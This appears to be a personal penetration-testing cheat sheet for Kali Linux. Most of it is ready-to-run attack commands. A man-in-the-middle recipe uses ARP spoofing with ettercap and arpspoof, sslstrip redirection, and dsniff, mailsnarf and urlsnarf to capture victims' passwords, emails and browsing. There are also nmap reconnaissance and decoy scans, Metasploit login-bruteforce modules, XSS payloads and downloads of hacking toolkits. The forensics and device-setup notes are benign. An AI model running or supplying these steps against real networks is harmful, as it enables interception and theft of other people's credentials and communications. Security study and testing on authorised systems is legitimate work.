MiTM

1. Configure ip forwarding on attacker host

echo “1” > /proc/sys/net/ipv4/ip_forward

2. Redirection of http traffic to sslstrip
2a. iptables -t nat -A PREROUTING -i eth0 -p tcp –destination-port 80 -j REDIRECT –to-port 8000
2b. iptables-save

3. SSLStrip
sslstrip -k -l 8000 -w encrypted.txt

4. Ettercap
ettercap -TqM arp:remote <victim_ip> <gateway_ip>

5 Arpspoof
5a. Single host > arpspoof -i eth0 -t <victim_ip> <gateway_ip>
5b. Whole net > arpspoof -i eth0 <gateway_ip>

5. Urlsnarf – capture http
urlsnarf -i eth0

6. Driftnet – capture images
driftnet -i eth0

7. Dsniff – capture passwords
dsniff -i eth0 -w plaintext.txt

8. Mailsnarf – capture emails
mailsnarf -i eth0

Memory analysis :: Volatility

digital forensics

Memory acquisition:
Dump memory using FTK Imager or similar software.

Volatility
Processes:
> volatility pslist -f memory.img

Services:
> volatility svcscan -f memory.img –profile=Win7SP0x64

Hidden/terminated processes:
> volatility psscan -f memory.img

Yara scan:
> volatility yarascan –yara-file=/path/to/rules.yar -f memory.img

nmap

Scan methodology

  1. Scan for live hosts

    1. nmap -sn -oA subnet_live 192.168.1.0/24
  2. Parse list w/ live hosts

    1. cat subnet_live.gnmap | awk ‘{print $2}’ > subnet_live_parsed
  3. Scan hosts for app ver. of top 500 ports

    1. nmap -sS -sV -O -min-parallelism 400 -max-parallelism 512 -script banner.nse,http-headers -top-ports 500 -iL subnet_live_parsed -oA subnet_live_top500
  4. Parse lists for top vuln. ports

    1. All found
      1. cat subnet_live_top500.gnmap | grep ’21/open\|22/open\|80/open\|81/open\|85/open\|88/open\|443/open\|1433/open\|3128/open\|3306/open\|5900/open\|8080/open’ | awk ‘{print $2}’ > subnet_live_top_vulnports
    2. FTP
      1. cat subnet_live_top500.gnmap | grep 21/open | awk ‘{print $2}’ > subnet_live_ftp
    3. SSH
      1. cat subnet_live_top500.gnmap | grep 22/open | awk ‘{print $2}’ > subnet_live_ssh
    4. MSSQL
      1. cat subnet_live_top500.gnmap | grep 1433/open | awk ‘{print $2}’ > subnet_live_mssql
    5. MYSQL
      1. cat subnet_live_top500.gnmap | grep 3306/open | awk ‘{print $2}’ > subnet_live_mysql
    6. VNC
      1. cat subnet_live_top500.gnmap | grep 5900/open | awk ‘{print $2}’ > subnet_live_vnc
    7. HTTP
      1. cat subnet_live_top500.gnmap | grep 80/open | awk ‘{print $2}’ > subnet_live_http

Metasploit scans of found hosts & their respective ports

  1. FTP scan :: msf > use auxiliary/scanner/ftp/ftp_login
  2. SSH scan :: msf > use auxiliary/scanner/ssh/ssh_login
  3. MSSQL scan :: msf > use auxiliary/scanner/mssql/mssql_login
  4. SNMP scan :: msf > use auxiliary/scanner/snmp/snmp_enum; snmp_login
  5. MYSQL scan :: msf > use auxiliary/scanner/mysql/mysql_login
  6. VNC scan :: msf > use auxiliary/scanner/vnc/vnc_login

Top Ports

nmap -sS -sV -O –min-parallelism 400 –max-parallelism 512 –script banner.nse,http-headers –top-ports 500 192.168.1.1

Search for BMC Vuln

nmap -p 49152 -n -oA ./bmc_vuln.txt –min-parallelism 512 –min-rate 400 -Pn 192.168.1.0/24

Search for MSSQL

  • nmap -sV -p T:1433 -n -oG ./scans/mssql_tcp_1433_scan.txt -Pn –min-parallelism 512 –min-rate 400 [ip_range]
  • nmap -p 1433 -oG ./scans/mssql_tcp_1433_scan.txt –script ms-sql-info –script-args mssql.instance-port=1433 –min-parallelism 512 –min-rate 400 [ip_range]

Web server enumeration
nmap -sV –script=http-enum [target_ip]

Check for vulns.
nmap –script=smb-check-vulns -p445 [target_ip]

dns-blacklist
nmap -sn [target_ip] –script=dns-blacklist

SQLi
nmap -T4 -A -v –script=sql-injection [target_ip]

Decoy scan
nmap -D RND:10 [target_ip]

nmap -D decoy1,decoy2,etc [target_ip]

Live hosts
nmap -sn [target_net]

Host scan
nmap -sS -Pn -n -PS [target_ip]

Host service scan
nmap -sS -Pn -n -A [target_ip]

Hosts down
nmap -v -sn -oG – target_ip | grep Down

 

Scripts :: Kali

kali-wp-june-2014_1920x1080_A

KAAISv3 by rawstring

  • wget http://sourceforge.net/projects/kaais/files/kaaisv3.sh

netool.sh v4.3 by peterubuntu10

  • wget http://downloads.sourceforge.net/project/netoolsh/opensource%5Bkali%5D.tar.gz

Lazy Kali

https://code.google.com/p/lazykali/

  • wget https://lazykali.googlecode.com/files/lazykali.sh
  • wget https://lazykali.googlecode.com/files/hackpack.tar.gz

Pentesh.sh by phillips321.co.uk

  • svn checkout http://phillips321.googlecode.com/svn/trunk/ phillips321

Discover.sh by Lee Baird

  • git clone https://github.com/leebaird/discover.git

1st setup :: Kali

kali-wp-june-2014_1920x1080_A

Correct sources.list

nano /etc/apt/sources.list
add following to sources.list:

Regular repos
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

Bleeding Edge repos
deb http://http.kali.org/kali kali-bleeding-edge contrib non-free main

# apt-get update
# apt-get upgrade

In VBox Environ

VBox Additions
1. apt-get update && apt-get install linux-headers-$(uname -r) -y
3. mount VBoxAdditions package
4. copy install package (VBoxLinuxAdditions.run) to /tmp
5. chmod 755 /tmp/VBoxLinuxAdditions.run
6. ./VBoxLinuxAdditions.run
7. logout or reboot guest machine

Update

  • apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && reboot

 

XSS

XSS_Hackem

Test cases:

  • >”‘><script>alert(‘XSS’)</script>
  • >%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
  • AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
  • %22%2Balert(%27XSS%27)%2B%22
  • <table background=”javascript:alert(([code])”></table>
  • <object type=text/html data=”javascript:alert(([code]);”></object>
  • <body onload=”javascript:alert(([code])”></body>

Kali Pi :: Initial Setup

Raspi_Colour_R

Networking

[Static IP]
nano /etc/network/interfaces

Add following lines at the bottom of the file(comment out above lines except loopback iface):

auto eth0
allow-hotplug eth0
iface eth0 inet static
address 192.168.1.8
netmask 255.255.255.0
gateway 192.168.1.1

[DNS Conf]
nano /etc/resolv.conf
nameserver 192.168.1.1
nameserver 8.8.8.8

[Assign static default gateway]
ip route add default via 192.168.1.1

[Restart networking]
/etc/init.d/networking restart

Rebuild ssh keys
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart

Expand USB
run /scripts/rpi-wiggle.sh

Update Kali
apt-get update && apt-get -y upgrade && apt-get -y dist-upgrade && apt-get autoremove && reboot

Check service status
service ssh status
service postgresql status
service apache2 status

Apps

– TightVNC
apt-get install tightvncserver
update-rc.d tightvncserver enable

[Reset password]
vncpasswd

– Metasploit
apt-get install metasploit-framework
update-rc.d metasploit-framework enable

-LazyKali
wget lazykali.googlecode.com/files/lazykali.sh
wget lazykali.googlecode.com/files/hackpack.tar.gz

Make services persistent
update-rc.d ssh enable
update-rc.d apache2 enable
update-rc.d postgresql enable
update-rc.d metasploit-framework enable